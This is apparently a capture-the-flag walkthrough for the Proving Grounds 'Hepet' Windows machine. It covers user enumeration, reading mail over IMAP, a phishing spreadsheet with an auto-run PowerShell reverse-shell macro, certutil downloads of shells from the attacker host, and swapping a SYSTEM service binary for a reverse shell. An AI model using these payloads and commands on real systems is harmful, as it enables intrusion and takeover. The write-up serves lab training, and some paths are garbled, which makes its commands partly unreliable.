Proving Grounds Practice - Hepet Walkthrough Guide
Written on
Machine Name: Hepet Machine Type: Windows Difficulty: Intermediate Machine IP: 192.168.244.140 Local Kali IP: 192.168.45.241
Enumeration
Nmap Results autorecon 192.168.244.140
Port 79 ~/Desktop/tools/finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.244.140 | grep -v 'is not known'
Port 8000 Found several usernames.
This confirms the data from finger on port 79. Add these to user.txt. nano user.txt
# admin
# agnes
# charlotte
# jonas
# magnus
# martha
# ela
Check the web content. curl -s http://192.168.244.140:8000/ | html2markdown
This appears to be a password. Credentials: jonas:SicMundusCreatusEst
Port 143 Let's examine the emails. nc 192.168.244.140 143
tag login jonas@localhost SicMundusCreatusEst
tag LIST "" "*"
tag SELECT INBOX
tag STATUS INBOX (MESSAGES)
tag fetch 1 (BODY[1])
tag fetch 2:5 BODY[HEADER] BODY[1]
We find that the mailadmin@localhost account is managing spreadsheets. The software used is likely LibreOffice, suggesting it will accept .ods or .xls files, presenting a potential vector for a macro attack.
Create a macro payload. msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=4444 -f hta-psh -o evil.hta
Open the evil.hta file and split the payload. nano splitter.py
s = "powershell.exe -nop -w hidden -e <payload>"
n = 50
for i in range(0, len(s), n):
chunk = s[i:i + n]
print('Str = Str + "' + chunk + '"')
Create a new .ods file in LibreOffice Calc.
Enable auto-run once the spreadsheet is opened: Tools ? Customize.
Send the file via email. sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s 192.168.244.140:25 -u 'a spreadsheet' -m 'Please check this spreadsheet' -a exploit.ods
nc -nvlp 4444
After a prolonged wait, someone eventually clicked on the file.
Privilege Escalation
Establish persistent access for future enumeration. cd C:xampphtdocs certutil -urlcache -split -f http://192.168.45.192/rev.exe certutil -urlcache -split -f http://192.168.45.192/shell.pHp
Upload WinPEAS and execute. certutil -urlcache -split -f http://192.168.45.192/wps.exe
Some relevant information is gathered.
This process looks suspicious!
It resides in the user's Veyon directory. Let's investigate further. sc qc VeyonService
It operates with system privileges.
Let's substitute the file in this directory with a reverse shell: C:UsersEla ArwelVeyonveyon-service.exe. # on kali msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.192 LPORT=5555 -f exe -o veyon-service.exe nc -nvlp 5555 # on victim Windows cd C:UsersEla ArwelVeyon move veyon-service.exe veyon-service.bak certutil -f -urlcache http://192.168.45.192:80/veyon-service.exe veyon-service.exe shutdown /r
We have now gained admin access! Mission Accomplished!